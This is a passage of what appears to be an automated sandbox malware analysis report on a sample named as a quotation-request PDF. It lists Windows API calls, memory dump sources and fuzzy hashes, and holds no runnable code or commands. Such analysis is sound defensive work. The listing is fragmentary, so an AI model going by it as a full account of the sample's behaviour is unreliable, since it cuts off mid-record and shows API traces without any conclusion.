                                                                    • MultiByteToWideChar.KERNEL32(BBDAE900,00000009,?,000001AC,00000000,00000000,?,?,?,0042D7C1,?,00000000), ref: 004208D7
                                                                    • MultiByteToWideChar.KERNEL32(BBDAE900,00000009,?,00000001,00000000,00000000,?,?,?,0042D7C1,?,00000000), ref: 00420945
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.1300430383.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000002.00000002.1300412122.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300492263.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300519320.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300540141.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300560025.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300560025.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300606091.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_400000_Quotation request -30112024_pdf.jbxd
                                                                    Similarity
                                                                    • API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
                                                                    • String ID:
                                                                    • API String ID: 3058430110-0
                                                                    • Opcode ID: 6122c04dd5dc57efc0e5b6c0779ec963bae9ccf891294cd495d8fd5d7cdcec1f
                                                                    • Instruction ID: f6550d230e50e909e13d2a99824cc28569674f7a7b9e5ef0daa2e7ce22e82e6e
                                                                    • Opcode Fuzzy Hash: 6122c04dd5dc57efc0e5b6c0779ec963bae9ccf891294cd495d8fd5d7cdcec1f
                                                                    • Instruction Fuzzy Hash: D731E231B00265EFDB20EF65E884AAF3BE5BF00310F55496AE4658B292D734CD80DB98
                                                                    APIs
                                                                    • GetParent.USER32(?), ref: 004503C8
                                                                    • DefDlgProcW.USER32(?,00000138,?,?), ref: 00450417
                                                                    • DefDlgProcW.USER32(?,00000133,?,?), ref: 00450466
                                                                    • DefDlgProcW.USER32(?,00000134,?,?), ref: 00450497
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.1300430383.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000002.00000002.1300412122.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300492263.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300519320.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300540141.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300560025.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300560025.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300606091.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_400000_Quotation request -30112024_pdf.jbxd
                                                                    Similarity
                                                                    • API ID: Proc$Parent
                                                                    • String ID:
                                                                    • API String ID: 2351499541-0
                                                                    • Opcode ID: 953005dfd523491bc8661b2d189c1fe3a1d27544861a9947cd3b684206b02ae0
                                                                    • Instruction ID: 48835c6935d03606f494e5d0f95072c3389227be5880c4b08380f2331de9f088
                                                                    • Opcode Fuzzy Hash: 953005dfd523491bc8661b2d189c1fe3a1d27544861a9947cd3b684206b02ae0
                                                                    • Instruction Fuzzy Hash: F231B73A2001046BD720CF18DC94DAB7719EF97335B14461BFA298B3D3CB759856C769
                                                                    APIs
                                                                    • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00442AC9
                                                                    • TranslateMessage.USER32(?), ref: 00442B01
                                                                    • DispatchMessageW.USER32(?), ref: 00442B0B
                                                                    • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00442B21
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.1300430383.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000002.00000002.1300412122.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300492263.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300519320.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300540141.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300560025.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300560025.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300606091.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_400000_Quotation request -30112024_pdf.jbxd
                                                                    Similarity
                                                                    • API ID: Message$Peek$DispatchTranslate
                                                                    • String ID:
                                                                    • API String ID: 1795658109-0
                                                                    • Opcode ID: 36eab9d42bd73f6f728abf92f57c3db94032fb3fd80da71d70c6aa8f6f72699a
                                                                    • Instruction ID: 5e5183f3b0572ad37d893cec5a7cf9421d6c1ddc4b80b1975d6d8daaa3c1acd1
                                                                    • Opcode Fuzzy Hash: 36eab9d42bd73f6f728abf92f57c3db94032fb3fd80da71d70c6aa8f6f72699a
                                                                    • Instruction Fuzzy Hash: 012126719583469AFB30DF649D85FB7BBA8CB24314F40407BF91097281EAB86848C769
                                                                    APIs
                                                                    • GetForegroundWindow.USER32(?,?,?), ref: 0047439C
                                                                      • Part of subcall function 004439C1: GetWindowThreadProcessId.USER32(?,00000000), ref: 004439E4
                                                                      • Part of subcall function 004439C1: GetCurrentThreadId.KERNEL32 ref: 004439EB
                                                                      • Part of subcall function 004439C1: AttachThreadInput.USER32(00000000), ref: 004439F2
                                                                    • GetCaretPos.USER32(?), ref: 004743B2
                                                                    • ClientToScreen.USER32(00000000,?), ref: 004743E8
                                                                    • GetForegroundWindow.USER32 ref: 004743EE
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.1300430383.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000002.00000002.1300412122.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300492263.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300519320.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300540141.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300560025.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300560025.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300606091.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_400000_Quotation request -30112024_pdf.jbxd
                                                                    Similarity
                                                                    • API ID: ThreadWindow$Foreground$AttachCaretClientCurrentInputProcessScreen
                                                                    • String ID:
                                                                    • API String ID: 2759813231-0
                                                                    • Opcode ID: f13b499454a1a1822ca13fc8ae6b328d463f7326d10c65fcbffa9176c03fd335
                                                                    • Instruction ID: 29594bdffde582d62cf8cb535202cb0f6e37f5c0e74140e0e8dac686a3932322
                                                                    • Opcode Fuzzy Hash: f13b499454a1a1822ca13fc8ae6b328d463f7326d10c65fcbffa9176c03fd335
                                                                    • Instruction Fuzzy Hash: 2F21AC71A00305ABD710EF75CC86B9E77B9AF44708F14446EF644BB2C2DBF9A9408BA5
                                                                    APIs
                                                                      • Part of subcall function 00430626: _wcspbrk.LIBCMT ref: 00430636
                                                                    • SendMessageW.USER32(?,00001002,00000000,?), ref: 00449477
                                                                    • SendMessageW.USER32(?,00001060,00000000,00000004), ref: 00449507
                                                                    • _wcslen.LIBCMT ref: 00449519
                                                                    • _wcslen.LIBCMT ref: 00449526
                                                                    Similarity
                                                                    • API ID: MessageSend_wcslen$_wcspbrk
                                                                    • String ID:
                                                                    • API String ID: 2886238975-0
                                                                    • Opcode ID: cda1f7e16000b3d6f1552df2769fac91363fb93f1f54a3f578086acf89ecf69d
                                                                    • Instruction ID: 7d4d19c59aaf55394df3596c947b25f6969e765268ec3300c5285dc4bbf20b28
                                                                    • Opcode Fuzzy Hash: cda1f7e16000b3d6f1552df2769fac91363fb93f1f54a3f578086acf89ecf69d
                                                                    • Instruction Fuzzy Hash: F7213A76B00208A6E730DF55ED81BEFB368EBA0310F10416FFF0896240E6794D55C799
                                                                    APIs
                                                                    Similarity
                                                                    • API ID: __setmode$DebugOutputString_fprintf
                                                                    • String ID:
                                                                    • API String ID: 1792727568-0
                                                                    • Opcode ID: 5d4322aea4207270e306f71f31351bd3950e7b1fce0631062c9bba007b08485e
                                                                    • Instruction ID: 94d91137fd77379d51e6296772f15362c7f2cf1f8b16651245aa9cc134f84072
                                                                    • Opcode Fuzzy Hash: 5d4322aea4207270e306f71f31351bd3950e7b1fce0631062c9bba007b08485e
                                                                    • Instruction Fuzzy Hash: 5411A1B2D0020477DB107BB69C469AF7B2C8B55728F04416EF91573243E97C6A4947AB
                                                                    APIs
                                                                      • Part of subcall function 0046F3C1: IsWindow.USER32(00000000), ref: 0046F3F1
                                                                    • GetWindowLongW.USER32(?,000000EC), ref: 0047A2DF
                                                                    • SetWindowLongW.USER32(?,000000EC,00000000), ref: 0047A2FA
                                                                    • SetWindowLongW.USER32(?,000000EC,00000000), ref: 0047A312
                                                                    • SetLayeredWindowAttributes.USER32(?,00000000,?,00000002,?,000000EC,00000000,?,000000EC,?,00000001), ref: 0047A321
                                                                    Similarity
                                                                    • API ID: Window$Long$AttributesLayered
                                                                    • String ID:
                                                                    • API String ID: 2169480361-0
                                                                    • Opcode ID: 53dc7990cfeb01f65bcc542d15cac6368a2c86d5c8ae23ecc65d9f578e391a7a
                                                                    • Instruction ID: 4b457c036b32d13d4d6aa44b7b333d7b15c6210fa1ac615a770d46c951a2b689
                                                                    • Opcode Fuzzy Hash: 53dc7990cfeb01f65bcc542d15cac6368a2c86d5c8ae23ecc65d9f578e391a7a
                                                                    • Instruction Fuzzy Hash: E321C3322045146BD310AB19EC45F9BB798EF81334F20862BF859E72D1C779A855C7AC
                                                                    APIs
                                                                      • Part of subcall function 00434C09: lstrlenW.KERNEL32(?), ref: 00434C1C
                                                                      • Part of subcall function 00434C09: lstrcpyW.KERNEL32(00000000,?), ref: 00434C44
                                                                      • Part of subcall function 00434C09: lstrcmpiW.KERNEL32(00000000,00000000), ref: 00434C78
                                                                    • lstrlenW.KERNEL32(?), ref: 00434CF6
                                                                      • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                                                    • lstrcpyW.KERNEL32(00000000,?), ref: 00434D1E
                                                                    • lstrcmpiW.KERNEL32(00000002,cdecl), ref: 00434D64
                                                                    Strings
                                                                    Similarity
                                                                    • API ID: lstrcmpilstrcpylstrlen$_malloc
                                                                    • String ID: cdecl
                                                                    • API String ID: 3850814276-3896280584
                                                                    • Opcode ID: 8791bd385ad911e302230f453ee94e3228b88862fdf6aa3d8d13645c92189192
                                                                    • Instruction ID: b4b7f9d7485e9dcc41445171e378d0673d7e4b3d8a31a27b28546bfa00bfc119
                                                                    • Opcode Fuzzy Hash: 8791bd385ad911e302230f453ee94e3228b88862fdf6aa3d8d13645c92189192
                                                                    • Instruction Fuzzy Hash: 1521D276200301ABD710AF25DC45AEBB3A9FF99354F10583FF90687250EB39E945C7A9
                                                                    APIs
                                                                      • Part of subcall function 0045F645: WideCharToMultiByte.KERNEL32(00000000,00000000,5004C483,D29EE858,00000000,00000000,00000000,00000000,?,?,?,00467B75,?,00473BB8,00473BB8,?), ref: 0045F661
                                                                    • gethostbyname.WSOCK32(?,00000000,?,?), ref: 0046D42D
                                                                    • WSAGetLastError.WSOCK32(00000000), ref: 0046D439
                                                                    • _memmove.LIBCMT ref: 0046D475
                                                                    • inet_ntoa.WSOCK32(?), ref: 0046D481
                                                                    Similarity
                                                                    • API ID: ByteCharErrorLastMultiWide_memmovegethostbynameinet_ntoa
                                                                    • String ID:
                                                                    • API String ID: 2502553879-0
                                                                    • Opcode ID: 4777d02d04a30dcfdb085943b42a4ccb2e6b73bd431d008d3c99f42dcf393561
                                                                    • Instruction ID: 24c3f219ec43f49587972b4c28f02db1d16d05b11a5808876a7c02c26e676da9
                                                                    • Opcode Fuzzy Hash: 4777d02d04a30dcfdb085943b42a4ccb2e6b73bd431d008d3c99f42dcf393561
                                                                    • Instruction Fuzzy Hash: A7216F769001046BC700FBA6DD85C9FB7BCEF48318B10486BFC01B7241DA39EE058BA5
                                                                    APIs
                                                                    • SendMessageW.USER32 ref: 00448C69
                                                                    • GetWindowLongW.USER32(?,000000EC), ref: 00448C91
                                                                    • SendMessageW.USER32(?,0000104C,00000000,?), ref: 00448CCA
                                                                    • SendMessageW.USER32(?,0000102B,00000000,?), ref: 00448D13
                                                                    Similarity
                                                                    • API ID: MessageSend$LongWindow
                                                                    • String ID:
                                                                    • API String ID: 312131281-0
                                                                    • Opcode ID: aa9ba785652a5e2d68973233cc9ee5be9ec2ae113b50a66827928a68bf1dc890
                                                                    • Instruction ID: 9d65767971b32091eca868ce8e4b461936feaca2c152e776436a997c982fc1ac
                                                                    • Opcode Fuzzy Hash: aa9ba785652a5e2d68973233cc9ee5be9ec2ae113b50a66827928a68bf1dc890
                                                                    • Instruction Fuzzy Hash: 782186711193009BE3209F18DD88B9FB7E4FBD5325F140B1EF994962D0DBB58448C755
                                                                    APIs
                                                                    • select.WSOCK32(00000000,?,00000000,00000000,?), ref: 00458ABD
                                                                    • __WSAFDIsSet.WSOCK32(00000000,00000001), ref: 00458ACF
                                                                    • accept.WSOCK32(00000000,00000000,00000000), ref: 00458ADE
                                                                    • WSAGetLastError.WSOCK32(00000000), ref: 00458B03
                                                                    Similarity
                                                                    • API ID: ErrorLastacceptselect
                                                                    • String ID:
                                                                    • API String ID: 385091864-0
                                                                    • Opcode ID: feb2d603c895e760471213290e220df4c8c9e23c071c6cdae6f1f3a6ceb811dc
                                                                    • Instruction ID: 6dce411450cb473f00463c700f03c36a20fe0f69cdcaeecb298670ce0bdbd9a3
                                                                    • Opcode Fuzzy Hash: feb2d603c895e760471213290e220df4c8c9e23c071c6cdae6f1f3a6ceb811dc
                                                                    • Instruction Fuzzy Hash: 032192716002049FD714EF69DD45BAAB7E8EB94310F10866EF988DB380DBB4A9808B94
                                                                    APIs
                                                                    • SendMessageW.USER32(?,000000B0,?,?), ref: 004368C2
                                                                    • SendMessageW.USER32(?,000000C9,?,00000000), ref: 004368D5
                                                                    • SendMessageW.USER32(?,000000C9,?,00000000), ref: 004368EC
                                                                    • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00436904
                                                                    Similarity
                                                                    • API ID: MessageSend
                                                                    • String ID:
                                                                    • API String ID: 3850602802-0
                                                                    • Opcode ID: 236e71af2ab5509716104e28957e7b962cfbcf4ba6a1ba9531cfd5eb7baefe48
                                                                    • Instruction ID: 15055718653181d31d708d6839b45d2b231db9ad4f5f2f8f789da6f3b04ac486
                                                                    • Opcode Fuzzy Hash: 236e71af2ab5509716104e28957e7b962cfbcf4ba6a1ba9531cfd5eb7baefe48
                                                                    • Instruction Fuzzy Hash: A7111275640208BFDB10DF68DC85F9AB7E8EF98750F11815AFD48DB340D6B1A9418FA0
                                                                    APIs
                                                                    • CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00400000,00000000), ref: 00430242
                                                                    • GetStockObject.GDI32(00000011), ref: 00430258
                                                                    • SendMessageW.USER32(00000000,00000030,00000000), ref: 00430262
                                                                    • ShowWindow.USER32(00000000,00000000), ref: 0043027D
                                                                    Similarity
                                                                    • API ID: Window$CreateMessageObjectSendShowStock
                                                                    • String ID:
                                                                    • API String ID: 1358664141-0
                                                                    • Opcode ID: ad6f98361a8c00dabf9f53bae98ff29a7c8ddeda354316ac2ad0817ad8c48d31
                                                                    • Instruction ID: 87b955557270564ac2446a75def7de819d41fbc8528d619d8765837e6f615a12
                                                                    • Opcode Fuzzy Hash: ad6f98361a8c00dabf9f53bae98ff29a7c8ddeda354316ac2ad0817ad8c48d31
                                                                    • Instruction Fuzzy Hash: BD115172600504ABD755CF99DC59FDBB769AF8DB10F148319BA08932A0D774EC41CBA8
                                                                    APIs
                                                                    • GetCurrentThreadId.KERNEL32 ref: 00443CA6
                                                                    • MessageBoxW.USER32(?,?,?,?), ref: 00443CDC
                                                                    • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 00443CF2
                                                                    • CloseHandle.KERNEL32(00000000), ref: 00443CF9
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.1300430383.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000002.00000002.1300412122.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300492263.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300519320.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300540141.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300560025.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300560025.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300606091.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_400000_Quotation request -30112024_pdf.jbxd
                                                                    Similarity
                                                                    • API ID: CloseCurrentHandleMessageObjectSingleThreadWait
                                                                    • String ID:
                                                                    • API String ID: 2880819207-0
                                                                    • Opcode ID: 229c650092e78496607f1920186e21dd31435e443465a7f1ce6d350790d3a3c2
                                                                    • Instruction ID: e6f874550e00e623fb34483f391c95d80eb5f5bc6ce026338450b862d26ff76c
                                                                    • Opcode Fuzzy Hash: 229c650092e78496607f1920186e21dd31435e443465a7f1ce6d350790d3a3c2
                                                                    • Instruction Fuzzy Hash: 48112572804114ABD710CF68ED08ADF3FACDF99721F10026AFC0493381D6B09A1083E9
                                                                    APIs
                                                                    • GetWindowRect.USER32(?,?), ref: 00430BA2
                                                                    • ScreenToClient.USER32(?,?), ref: 00430BC1
                                                                    • ScreenToClient.USER32(?,?), ref: 00430BE2
                                                                    • InvalidateRect.USER32(?,?,?,?,?), ref: 00430BFB
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.1300430383.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000002.00000002.1300412122.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300492263.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300519320.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300540141.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300560025.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300560025.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300606091.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_400000_Quotation request -30112024_pdf.jbxd
                                                                    Similarity
                                                                    • API ID: ClientRectScreen$InvalidateWindow
                                                                    • String ID:
                                                                    • API String ID: 357397906-0
                                                                    • Opcode ID: ae0d0d06dcef6ed583fb9704f0ef5e529f18a40629d10526419e4a4e3dd97404
                                                                    • Instruction ID: ace0395ef2957b48f9d17fb026497d1a369c9e3160b5fb36bd9a4683c33ce433
                                                                    • Opcode Fuzzy Hash: ae0d0d06dcef6ed583fb9704f0ef5e529f18a40629d10526419e4a4e3dd97404
                                                                    • Instruction Fuzzy Hash: 561174B9D00209AFCB14DF98C8849AEFBB9FF98310F10855EE855A3304D774AA41CFA0
                                                                    APIs
                                                                    • __wsplitpath.LIBCMT ref: 0043392E
                                                                      • Part of subcall function 00413A0E: __wsplitpath_helper.LIBCMT ref: 00413A50
                                                                    • __wsplitpath.LIBCMT ref: 00433950
                                                                    • __wcsicoll.LIBCMT ref: 00433974
                                                                    • __wcsicoll.LIBCMT ref: 0043398A
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.1300430383.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000002.00000002.1300412122.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300492263.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300519320.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300540141.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300560025.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300560025.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300606091.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_400000_Quotation request -30112024_pdf.jbxd
                                                                    Similarity
                                                                    • API ID: __wcsicoll__wsplitpath$__wsplitpath_helper
                                                                    • String ID:
                                                                    • API String ID: 1187119602-0
                                                                    • Opcode ID: 68e3b32a9464b28f7030a0941ccdc911afb24839bc46986435f1213a6174ca5b
                                                                    • Instruction ID: cee1712abd0eced5cc96ea34974ed2185298bb9760f8079e64959bf12be8e646
                                                                    • Opcode Fuzzy Hash: 68e3b32a9464b28f7030a0941ccdc911afb24839bc46986435f1213a6174ca5b
                                                                    • Instruction Fuzzy Hash: 650121B2C0011DAACB14DF95DC41DEEB37CAB48314F04869EA60956040EA759BD88FE4
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.1300430383.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000002.00000002.1300412122.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300492263.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300519320.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300540141.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300560025.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300560025.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300606091.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_400000_Quotation request -30112024_pdf.jbxd
                                                                    Similarity
                                                                    • API ID: _wcslen$_malloc_wcscat_wcscpy
                                                                    • String ID:
                                                                    • API String ID: 1597257046-0
                                                                    • Opcode ID: 27641d7f5b4c314b80b3255f46ec4c72bfd903a458e0b29326d4da6bd0c91e1b
                                                                    • Instruction ID: 3a313011a65081929a098f39c1c59cfda42f2cbb237f2651e2b7e76e77134880
                                                                    • Opcode Fuzzy Hash: 27641d7f5b4c314b80b3255f46ec4c72bfd903a458e0b29326d4da6bd0c91e1b
                                                                    • Instruction Fuzzy Hash: 40016271200604BFC714EB66D885EABF3EDEFC9354B00852EFA168B651DB39E841C764
                                                                    APIs
                                                                    • GetEnvironmentStringsW.KERNEL32(00000000,00416513), ref: 0041F587
                                                                    • __malloc_crt.LIBCMT ref: 0041F5B6
                                                                    • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 0041F5C3
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.1300430383.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000002.00000002.1300412122.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300492263.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300519320.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300540141.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300560025.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300560025.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300606091.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_400000_Quotation request -30112024_pdf.jbxd
                                                                    Similarity
                                                                    • API ID: EnvironmentStrings$Free__malloc_crt
                                                                    • String ID:
                                                                    • API String ID: 237123855-0
                                                                    • Opcode ID: 07fe547740a9b68c76983245d8bba65816afc234b1fe2171e551a8e4c438482c
                                                                    • Instruction ID: d6a98a4ee5591e13f27bf8bfb2f7094eea62761642478a01f8f101a8eeefaa10
                                                                    • Opcode Fuzzy Hash: 07fe547740a9b68c76983245d8bba65816afc234b1fe2171e551a8e4c438482c
                                                                    • Instruction Fuzzy Hash: D1F08277505220BB8A25BF35BC458DB277ADAD536531A443BF407C3206F66C8ECB82B9
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.1300430383.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000002.00000002.1300412122.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300492263.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300519320.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300540141.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300560025.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300560025.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300606091.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_400000_Quotation request -30112024_pdf.jbxd
                                                                    Similarity
                                                                    • API ID: DeleteDestroyObject$IconWindow
                                                                    • String ID:
                                                                    • API String ID: 3349847261-0
                                                                    • Opcode ID: 7c154be5abaa40db753a7e31a7690d619ba9064fd0fbdb090dba25900d6c1ce3
                                                                    • Instruction ID: b40ecd1d224a0eee13877c21127d2214a34fa415f2bf64fab3c1d23e87691ec4
                                                                    • Opcode Fuzzy Hash: 7c154be5abaa40db753a7e31a7690d619ba9064fd0fbdb090dba25900d6c1ce3
                                                                    • Instruction Fuzzy Hash: 60F03C74200601DBC720EF66EDD892B77ACEF49762B00452AFD01D7256D738DC49CB69
                                                                    APIs
                                                                    • EnterCriticalSection.KERNEL32(?), ref: 0044B5F5
                                                                    • InterlockedExchange.KERNEL32(?,?), ref: 0044B603
                                                                    • LeaveCriticalSection.KERNEL32(?), ref: 0044B61A
                                                                    • LeaveCriticalSection.KERNEL32(?), ref: 0044B62C
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.1300430383.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000002.00000002.1300412122.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300492263.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300519320.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300540141.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300560025.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300560025.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300606091.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_400000_Quotation request -30112024_pdf.jbxd
                                                                    Similarity
                                                                    • API ID: CriticalSection$Leave$EnterExchangeInterlocked
                                                                    • String ID:
                                                                    • API String ID: 2223660684-0
                                                                    • Opcode ID: f874c154f8023f3ba0c2945d1949571bb5db8163ed48ea6956c7f1527a392a8b
                                                                    • Instruction ID: 403f3527bf09fa8cde02bf077099102ce48e3ba47acdf7e4c6f4aa39df9fcef1
                                                                    • Opcode Fuzzy Hash: f874c154f8023f3ba0c2945d1949571bb5db8163ed48ea6956c7f1527a392a8b
